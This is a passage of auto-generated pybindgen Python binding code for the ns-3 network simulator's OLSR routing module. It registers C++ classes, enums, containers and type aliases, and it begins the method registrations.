'network'): ns3::SocketIpTtlTag [class] module.add_class('SocketIpTtlTag', import_from_module='ns.network', parent=root_module['ns3::Tag']) ## socket.h (module 'network'): ns3::SocketIpv6HopLimitTag [class] module.add_class('SocketIpv6HopLimitTag', import_from_module='ns.network', parent=root_module['ns3::Tag']) ## socket.h (module 'network'): ns3::SocketIpv6TclassTag [class] module.add_class('SocketIpv6TclassTag', import_from_module='ns.network', parent=root_module['ns3::Tag']) ## socket.h (module 'network'): ns3::SocketPriorityTag [class] module.add_class('SocketPriorityTag', import_from_module='ns.network', parent=root_module['ns3::Tag']) ## socket.h (module 'network'): ns3::SocketSetDontFragmentTag [class] module.add_class('SocketSetDontFragmentTag', import_from_module='ns.network', parent=root_module['ns3::Tag']) ## nstime.h (module 'core'): ns3::Time [class] module.add_class('Time', import_from_module='ns.core') ## nstime.h (module 'core'): ns3::Time::Unit [enumeration] module.add_enum('Unit', ['Y', 'D', 'H', 'MIN', 'S', 'MS', 'US', 'NS', 'PS', 'FS', 'LAST'], outer_class=root_module['ns3::Time'], import_from_module='ns.core') ## nstime.h (module 'core'): ns3::Time [class] root_module['ns3::Time'].implicitly_converts_to(root_module['ns3::int64x64_t']) ## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class] module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >']) ## trailer.h (module 'network'): ns3::Trailer [class] module.add_class('Trailer', import_from_module='ns.network', parent=root_module['ns3::Chunk']) ## random-variable-stream.h (module 'core'): ns3::TriangularRandomVariable [class] module.add_class('TriangularRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::UniformRandomVariable [class] 
module.add_class('UniformRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::WeibullRandomVariable [class] module.add_class('WeibullRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::ZetaRandomVariable [class] module.add_class('ZetaRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::ZipfRandomVariable [class] module.add_class('ZipfRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## attribute.h (module 'core'): ns3::AttributeAccessor [class] module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >']) ## attribute.h (module 'core'): ns3::AttributeChecker [class] module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >']) ## attribute.h (module 'core'): ns3::AttributeValue [class] module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >']) ## callback.h (module 'core'): ns3::CallbackChecker [class] module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## callback.h (module 'core'): ns3::CallbackImplBase [class] module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> 
>']) ## callback.h (module 'core'): ns3::CallbackValue [class] module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## random-variable-stream.h (module 'core'): ns3::ConstantRandomVariable [class] module.add_class('ConstantRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::DeterministicRandomVariable [class] module.add_class('DeterministicRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::EmpiricalRandomVariable [class] module.add_class('EmpiricalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## attribute.h (module 'core'): ns3::EmptyAttributeAccessor [class] module.add_class('EmptyAttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::AttributeAccessor']) ## attribute.h (module 'core'): ns3::EmptyAttributeChecker [class] module.add_class('EmptyAttributeChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## attribute.h (module 'core'): ns3::EmptyAttributeValue [class] module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## random-variable-stream.h (module 'core'): ns3::ErlangRandomVariable [class] module.add_class('ErlangRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## event-impl.h (module 'core'): ns3::EventImpl [class] module.add_class('EventImpl', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >']) ## random-variable-stream.h (module 'core'): ns3::ExponentialRandomVariable [class] module.add_class('ExponentialRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## 
random-variable-stream.h (module 'core'): ns3::GammaRandomVariable [class] module.add_class('GammaRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## ipv4.h (module 'internet'): ns3::Ipv4 [class] module.add_class('Ipv4', import_from_module='ns.internet', parent=root_module['ns3::Object']) ## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker [class] module.add_class('Ipv4AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue [class] module.add_class('Ipv4AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker [class] module.add_class('Ipv4MaskChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue [class] module.add_class('Ipv4MaskValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute [class] module.add_class('Ipv4MulticastRoute', import_from_module='ns.internet', parent=root_module['ns3::SimpleRefCount< ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >']) ## ipv4-route.h (module 'internet'): ns3::Ipv4Route [class] module.add_class('Ipv4Route', import_from_module='ns.internet', parent=root_module['ns3::SimpleRefCount< ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >']) ## ipv4-routing-protocol.h (module 'internet'): ns3::Ipv4RoutingProtocol [class] module.add_class('Ipv4RoutingProtocol', import_from_module='ns.internet', parent=root_module['ns3::Object']) ## ipv4-static-routing.h (module 'internet'): ns3::Ipv4StaticRouting [class] module.add_class('Ipv4StaticRouting', import_from_module='ns.internet', parent=root_module['ns3::Ipv4RoutingProtocol']) ## ipv6-address.h (module 'network'): 
ns3::Ipv6AddressChecker [class] module.add_class('Ipv6AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue [class] module.add_class('Ipv6AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker [class] module.add_class('Ipv6PrefixChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue [class] module.add_class('Ipv6PrefixValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## random-variable-stream.h (module 'core'): ns3::LogNormalRandomVariable [class] module.add_class('LogNormalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## mac48-address.h (module 'network'): ns3::Mac48AddressChecker [class] module.add_class('Mac48AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## mac48-address.h (module 'network'): ns3::Mac48AddressValue [class] module.add_class('Mac48AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## net-device.h (module 'network'): ns3::NetDevice [class] module.add_class('NetDevice', import_from_module='ns.network', parent=root_module['ns3::Object']) ## net-device.h (module 'network'): ns3::NetDevice::PacketType [enumeration] module.add_enum('PacketType', ['PACKET_HOST', 'NS3_PACKET_HOST', 'PACKET_BROADCAST', 'NS3_PACKET_BROADCAST', 'PACKET_MULTICAST', 'NS3_PACKET_MULTICAST', 'PACKET_OTHERHOST', 'NS3_PACKET_OTHERHOST'], outer_class=root_module['ns3::NetDevice'], import_from_module='ns.network') ## net-device.h (module 'network'): ns3::NetDeviceQueue [class] module.add_class('NetDeviceQueue', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::NetDeviceQueue, ns3::empty, 
ns3::DefaultDeleter<ns3::NetDeviceQueue> >']) ## net-device.h (module 'network'): ns3::NetDeviceQueueInterface [class] module.add_class('NetDeviceQueueInterface', import_from_module='ns.network', parent=root_module['ns3::Object']) ## nix-vector.h (module 'network'): ns3::NixVector [class] module.add_class('NixVector', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >']) ## node.h (module 'network'): ns3::Node [class] module.add_class('Node', import_from_module='ns.network', parent=root_module['ns3::Object']) ## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable [class] module.add_class('NormalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## object-factory.h (module 'core'): ns3::ObjectFactoryChecker [class] module.add_class('ObjectFactoryChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## object-factory.h (module 'core'): ns3::ObjectFactoryValue [class] module.add_class('ObjectFactoryValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper [class] module.add_class('OutputStreamWrapper', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >']) ## packet.h (module 'network'): ns3::Packet [class] module.add_class('Packet', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >']) ## random-variable-stream.h (module 'core'): ns3::ParetoRandomVariable [class] module.add_class('ParetoRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## net-device.h (module 'network'): ns3::QueueItem [class] module.add_class('QueueItem', import_from_module='ns.network', 
parent=root_module['ns3::SimpleRefCount< ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >']) ## net-device.h (module 'network'): ns3::QueueItem::Uint8Values [enumeration] module.add_enum('Uint8Values', ['IP_DSFIELD'], outer_class=root_module['ns3::QueueItem'], import_from_module='ns.network') ## nstime.h (module 'core'): ns3::TimeValue [class] module.add_class('TimeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## type-id.h (module 'core'): ns3::TypeIdChecker [class] module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## type-id.h (module 'core'): ns3::TypeIdValue [class] module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## address.h (module 'network'): ns3::AddressChecker [class] module.add_class('AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## address.h (module 'network'): ns3::AddressValue [class] module.add_class('AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## ipv4-list-routing.h (module 'internet'): ns3::Ipv4ListRouting [class] module.add_class('Ipv4ListRouting', import_from_module='ns.internet', parent=root_module['ns3::Ipv4RoutingProtocol']) module.add_container('std::vector< ns3::Ipv6Address >', 'ns3::Ipv6Address', container_type=u'vector') module.add_container('std::map< unsigned int, unsigned int >', ('unsigned int', 'unsigned int'), container_type=u'map') module.add_container('std::vector< unsigned int >', 'unsigned int', container_type=u'vector') ## Register a nested module for the namespace FatalImpl nested_module = module.add_cpp_namespace('FatalImpl') register_types_ns3_FatalImpl(nested_module) ## Register a nested module for the namespace Hash nested_module = module.add_cpp_namespace('Hash') register_types_ns3_Hash(nested_module) ## Register a nested module for the namespace TracedValueCallback 
    # NOTE(review): the statements below are the tail of a register_types()
    # function whose definition starts before this chunk — presumably the
    # top-level type-registration entry point generated by pybindgen; verify
    # against the start of the file.
    nested_module = module.add_cpp_namespace('TracedValueCallback')
    register_types_ns3_TracedValueCallback(nested_module)
    ## Register a nested module for the namespace olsr
    nested_module = module.add_cpp_namespace('olsr')
    register_types_ns3_olsr(nested_module)

def register_types_ns3_FatalImpl(module):
    """Register types for the ns3::FatalImpl namespace (no public types)."""
    root_module = module.get_root()

def register_types_ns3_Hash(module):
    """Register types for the ns3::Hash namespace: the Implementation base
    class, the hash-function-pointer type aliases, and the nested
    ns3::Hash::Function namespace."""
    root_module = module.get_root()
    ## hash-function.h (module 'core'): ns3::Hash::Implementation [class]
    module.add_class('Implementation', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >'])
    # Aliases for the raw 32-/64-bit hash function pointer types, plus their
    # pointer and reference variants.
    typehandlers.add_type_alias(u'uint32_t ( * ) ( char const *, size_t ) *', u'ns3::Hash::Hash32Function_ptr')
    typehandlers.add_type_alias(u'uint32_t ( * ) ( char const *, size_t ) **', u'ns3::Hash::Hash32Function_ptr*')
    typehandlers.add_type_alias(u'uint32_t ( * ) ( char const *, size_t ) *&', u'ns3::Hash::Hash32Function_ptr&')
    typehandlers.add_type_alias(u'uint64_t ( * ) ( char const *, size_t ) *', u'ns3::Hash::Hash64Function_ptr')
    typehandlers.add_type_alias(u'uint64_t ( * ) ( char const *, size_t ) **', u'ns3::Hash::Hash64Function_ptr*')
    typehandlers.add_type_alias(u'uint64_t ( * ) ( char const *, size_t ) *&', u'ns3::Hash::Hash64Function_ptr&')
    ## Register a nested module for the namespace Function
    nested_module = module.add_cpp_namespace('Function')
    register_types_ns3_Hash_Function(nested_module)

def register_types_ns3_Hash_Function(module):
    """Register the concrete hash implementations in ns3::Hash::Function.

    All four classes derive from ns3::Hash::Implementation, which must
    already have been registered by register_types_ns3_Hash().
    """
    root_module = module.get_root()
    ## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a [class]
    module.add_class('Fnv1a', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
    ## hash-function.h (module 'core'): ns3::Hash::Function::Hash32 [class]
    module.add_class('Hash32', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
    ## hash-function.h (module 'core'): ns3::Hash::Function::Hash64 [class]
    module.add_class('Hash64', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
    ## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3 [class]
    module.add_class('Murmur3', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])

def register_types_ns3_TracedValueCallback(module):
    """Register type aliases for the ns3::TracedValueCallback namespace."""
    root_module = module.get_root()
    typehandlers.add_type_alias(u'void ( * ) ( ns3::Time, ns3::Time ) *', u'ns3::TracedValueCallback::Time')
    typehandlers.add_type_alias(u'void ( * ) ( ns3::Time, ns3::Time ) **', u'ns3::TracedValueCallback::Time*')
    typehandlers.add_type_alias(u'void ( * ) ( ns3::Time, ns3::Time ) *&', u'ns3::TracedValueCallback::Time&')

def register_types_ns3_olsr(module):
    """Register all types in the ns3::olsr namespace.

    Ordering matters: outer classes (e.g. MessageHeader) are registered
    before their nested classes/enums, and base classes (Header,
    Ipv4RoutingProtocol) must already exist in root_module.
    """
    root_module = module.get_root()
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::Association [struct]
    module.add_class('Association')
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::AssociationTuple [struct]
    module.add_class('AssociationTuple')
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::DuplicateTuple [struct]
    module.add_class('DuplicateTuple')
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::IfaceAssocTuple [struct]
    module.add_class('IfaceAssocTuple')
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::LinkTuple [struct]
    module.add_class('LinkTuple')
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader [class]
    module.add_class('MessageHeader', parent=root_module['ns3::Header'])
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::MessageType [enumeration]
    module.add_enum('MessageType', ['HELLO_MESSAGE', 'TC_MESSAGE', 'MID_MESSAGE', 'HNA_MESSAGE'], outer_class=root_module['ns3::olsr::MessageHeader'])
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello [struct]
    module.add_class('Hello', outer_class=root_module['ns3::olsr::MessageHeader'])
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::LinkMessage [struct]
    module.add_class('LinkMessage', outer_class=root_module['ns3::olsr::MessageHeader::Hello'])
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna [struct]
    module.add_class('Hna', outer_class=root_module['ns3::olsr::MessageHeader'])
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna::Association [struct]
    module.add_class('Association', outer_class=root_module['ns3::olsr::MessageHeader::Hna'])
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Mid [struct]
    module.add_class('Mid', outer_class=root_module['ns3::olsr::MessageHeader'])
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Tc [struct]
    module.add_class('Tc', outer_class=root_module['ns3::olsr::MessageHeader'])
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::MprSelectorTuple [struct]
    module.add_class('MprSelectorTuple')
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::NeighborTuple [struct]
    module.add_class('NeighborTuple')
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::NeighborTuple::Status [enumeration]
    module.add_enum('Status', ['STATUS_NOT_SYM', 'STATUS_SYM'], outer_class=root_module['ns3::olsr::NeighborTuple'])
    ## olsr-state.h (module 'olsr'): ns3::olsr::OlsrState [class]
    module.add_class('OlsrState')
    ## olsr-header.h (module 'olsr'): ns3::olsr::PacketHeader [class]
    module.add_class('PacketHeader', parent=root_module['ns3::Header'])
    ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingProtocol [class]
    module.add_class('RoutingProtocol', parent=root_module['ns3::Ipv4RoutingProtocol'])
    ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingTableEntry [struct]
    module.add_class('RoutingTableEntry')
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::TopologyTuple [struct]
    module.add_class('TopologyTuple')
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::TwoHopNeighborTuple [struct]
    module.add_class('TwoHopNeighborTuple')
    # STL container registrations used by the wrapped OLSR API.
    module.add_container('std::vector< ns3::Ipv4Address >', 'ns3::Ipv4Address', container_type=u'vector')
    module.add_container('std::vector< ns3::olsr::MessageHeader::Hello::LinkMessage >', 'ns3::olsr::MessageHeader::Hello::LinkMessage', container_type=u'vector')
    module.add_container('std::vector< ns3::olsr::MessageHeader::Hna::Association >', 'ns3::olsr::MessageHeader::Hna::Association', container_type=u'vector')
    module.add_container('std::vector< ns3::olsr::MprSelectorTuple >', 'ns3::olsr::MprSelectorTuple', container_type=u'vector')
    module.add_container('std::vector< ns3::olsr::NeighborTuple >', 'ns3::olsr::NeighborTuple', container_type=u'vector')
    module.add_container('std::vector< ns3::olsr::TwoHopNeighborTuple >', 'ns3::olsr::TwoHopNeighborTuple', container_type=u'vector')
    module.add_container('ns3::olsr::MprSet', 'ns3::Ipv4Address', container_type=u'set')
    module.add_container('std::vector< ns3::olsr::LinkTuple >', 'ns3::olsr::LinkTuple', container_type=u'vector')
    module.add_container('std::vector< ns3::olsr::TopologyTuple >', 'ns3::olsr::TopologyTuple', container_type=u'vector')
    module.add_container('std::vector< ns3::olsr::IfaceAssocTuple >', 'ns3::olsr::IfaceAssocTuple', container_type=u'vector')
    module.add_container('std::vector< ns3::olsr::AssociationTuple >', 'ns3::olsr::AssociationTuple', container_type=u'vector')
    module.add_container('std::vector< ns3::olsr::Association >', 'ns3::olsr::Association', container_type=u'vector')
    module.add_container('std::vector< ns3::olsr::RoutingTableEntry >', 'ns3::olsr::RoutingTableEntry', container_type=u'vector')
    module.add_container('std::set< unsigned int >', 'unsigned int', container_type=u'set')
    # Typedef aliases for the OLSR repository sets: each C++ typedef gets the
    # base alias plus its pointer and reference forms.
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::DuplicateTuple, std::allocator< ns3::olsr::DuplicateTuple > >', u'ns3::olsr::DuplicateSet')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::DuplicateTuple, std::allocator< ns3::olsr::DuplicateTuple > >*', u'ns3::olsr::DuplicateSet*')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::DuplicateTuple, std::allocator< ns3::olsr::DuplicateTuple > >&', u'ns3::olsr::DuplicateSet&')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::MprSelectorTuple, std::allocator< ns3::olsr::MprSelectorTuple > >', u'ns3::olsr::MprSelectorSet')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::MprSelectorTuple, std::allocator< ns3::olsr::MprSelectorTuple > >*', u'ns3::olsr::MprSelectorSet*')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::MprSelectorTuple, std::allocator< ns3::olsr::MprSelectorTuple > >&', u'ns3::olsr::MprSelectorSet&')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::TopologyTuple, std::allocator< ns3::olsr::TopologyTuple > >', u'ns3::olsr::TopologySet')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::TopologyTuple, std::allocator< ns3::olsr::TopologyTuple > >*', u'ns3::olsr::TopologySet*')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::TopologyTuple, std::allocator< ns3::olsr::TopologyTuple > >&', u'ns3::olsr::TopologySet&')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::NeighborTuple, std::allocator< ns3::olsr::NeighborTuple > >', u'ns3::olsr::NeighborSet')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::NeighborTuple, std::allocator< ns3::olsr::NeighborTuple > >*', u'ns3::olsr::NeighborSet*')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::NeighborTuple, std::allocator< ns3::olsr::NeighborTuple > >&', u'ns3::olsr::NeighborSet&')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::LinkTuple, std::allocator< ns3::olsr::LinkTuple > >', u'ns3::olsr::LinkSet')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::LinkTuple, std::allocator< ns3::olsr::LinkTuple > >*', u'ns3::olsr::LinkSet*')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::LinkTuple, std::allocator< ns3::olsr::LinkTuple > >&', u'ns3::olsr::LinkSet&')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::MessageHeader, std::allocator< ns3::olsr::MessageHeader > >', u'ns3::olsr::MessageList')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::MessageHeader, std::allocator< ns3::olsr::MessageHeader > >*', u'ns3::olsr::MessageList*')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::MessageHeader, std::allocator< ns3::olsr::MessageHeader > >&', u'ns3::olsr::MessageList&')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::AssociationTuple, std::allocator< ns3::olsr::AssociationTuple > >', u'ns3::olsr::AssociationSet')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::AssociationTuple, std::allocator< ns3::olsr::AssociationTuple > >*', u'ns3::olsr::AssociationSet*')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::AssociationTuple, std::allocator< ns3::olsr::AssociationTuple > >&', u'ns3::olsr::AssociationSet&')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::Association, std::allocator< ns3::olsr::Association > >', u'ns3::olsr::Associations')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::Association, std::allocator< ns3::olsr::Association > >*', u'ns3::olsr::Associations*')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::Association, std::allocator< ns3::olsr::Association > >&', u'ns3::olsr::Associations&')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::IfaceAssocTuple, std::allocator< ns3::olsr::IfaceAssocTuple > >', u'ns3::olsr::IfaceAssocSet')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::IfaceAssocTuple, std::allocator< ns3::olsr::IfaceAssocTuple > >*', u'ns3::olsr::IfaceAssocSet*')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::IfaceAssocTuple, std::allocator< ns3::olsr::IfaceAssocTuple > >&', u'ns3::olsr::IfaceAssocSet&')
    typehandlers.add_type_alias(u'std::set< ns3::Ipv4Address, std::less< ns3::Ipv4Address >, std::allocator< ns3::Ipv4Address > >', u'ns3::olsr::MprSet')
    typehandlers.add_type_alias(u'std::set< ns3::Ipv4Address, std::less< ns3::Ipv4Address >, std::allocator< ns3::Ipv4Address > >*', u'ns3::olsr::MprSet*')
    typehandlers.add_type_alias(u'std::set< ns3::Ipv4Address, std::less< ns3::Ipv4Address >, std::allocator< ns3::Ipv4Address > >&', u'ns3::olsr::MprSet&')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::TwoHopNeighborTuple, std::allocator< ns3::olsr::TwoHopNeighborTuple > >', u'ns3::olsr::TwoHopNeighborSet')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::TwoHopNeighborTuple, std::allocator< ns3::olsr::TwoHopNeighborTuple > >*', u'ns3::olsr::TwoHopNeighborSet*')
    typehandlers.add_type_alias(u'std::vector< ns3::olsr::TwoHopNeighborTuple, std::allocator< ns3::olsr::TwoHopNeighborTuple > >&', u'ns3::olsr::TwoHopNeighborSet&')

def register_methods(root_module):
    """Register the methods of every wrapped class.

    NOTE(review): this function continues beyond this chunk; only the
    leading registrations are visible here.
    """
    register_Ns3Address_methods(root_module, root_module['ns3::Address'])
    register_Ns3AttributeConstructionList_methods(root_module, root_module['ns3::AttributeConstructionList'])
    register_Ns3AttributeConstructionListItem_methods(root_module, root_module['ns3::AttributeConstructionList::Item'])
    register_Ns3Buffer_methods(root_module, root_module['ns3::Buffer'])
    register_Ns3BufferIterator_methods(root_module, root_module['ns3::Buffer::Iterator'])
    register_Ns3ByteTagIterator_methods(root_module, root_module['ns3::ByteTagIterator'])
    register_Ns3ByteTagIteratorItem_methods(root_module, root_module['ns3::ByteTagIterator::Item'])
    register_Ns3ByteTagList_methods(root_module, root_module['ns3::ByteTagList'])
    register_Ns3ByteTagListIterator_methods(root_module, root_module['ns3::ByteTagList::Iterator'])
    register_Ns3ByteTagListIteratorItem_methods(root_module, root_module['ns3::ByteTagList::Iterator::Item'])
    register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
    register_Ns3EventGarbageCollector_methods(root_module, root_module['ns3::EventGarbageCollector'])
    register_Ns3EventId_methods(root_module, root_module['ns3::EventId'])
    register_Ns3Hasher_methods(root_module, root_module['ns3::Hasher'])
    register_Ns3Inet6SocketAddress_methods(root_module, root_module['ns3::Inet6SocketAddress'])
    register_Ns3InetSocketAddress_methods(root_module, root_module['ns3::InetSocketAddress'])
    register_Ns3IntToType__0_methods(root_module, root_module['ns3::IntToType< 0 >'])
register_Ns3IntToType__1_methods(root_module, root_module['ns3::IntToType< 1 >']) register_Ns3IntToType__2_methods(root_module, root_module['ns3::IntToType< 2 >']) register_Ns3IntToType__3_methods(root_module, root_module['ns3::IntToType< 3 >']) register_Ns3IntToType__4_methods(root_module, root_module['ns3::IntToType< 4 >']) register_Ns3IntToType__5_methods(root_module, root_module['ns3::IntToType< 5 >']) register_Ns3IntToType__6_methods(root_module, root_module['ns3::IntToType< 6 >']) register_Ns3Ipv4Address_methods(root_module, root_module['ns3::Ipv4Address']) register_Ns3Ipv4InterfaceAddress_methods(root_module, root_module['ns3::Ipv4InterfaceAddress']) register_Ns3Ipv4Mask_methods(root_module, root_module['ns3::Ipv4Mask']) register_Ns3Ipv4RoutingHelper_methods(root_module, root_module['ns3::Ipv4RoutingHelper']) register_Ns3Ipv6Address_methods(root_module, root_module['ns3::Ipv6Address']) register_Ns3Ipv6Prefix_methods(root_module, root_module['ns3::Ipv6Prefix']) register_Ns3Mac48Address_methods(root_module, root_module['ns3::Mac48Address']) register_Ns3NodeContainer_methods(root_module, root_module['ns3::NodeContainer']) register_Ns3NonCopyable_methods(root_module, root_module['ns3::NonCopyable']) register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase']) register_Ns3ObjectDeleter_methods(root_module, root_module['ns3::ObjectDeleter']) register_Ns3ObjectFactory_methods(root_module, root_module['ns3::ObjectFactory']) register_Ns3OlsrHelper_methods(root_module, root_module['ns3::OlsrHelper']) register_Ns3PacketMetadata_methods(root_module, root_module['ns3::PacketMetadata']) register_Ns3PacketMetadataItem_methods(root_module, root_module['ns3::PacketMetadata::Item']) register_Ns3PacketMetadataItemIterator_methods(root_module, root_module['ns3::PacketMetadata::ItemIterator']) register_Ns3PacketTagIterator_methods(root_module, root_module['ns3::PacketTagIterator']) register_Ns3PacketTagIteratorItem_methods(root_module, 
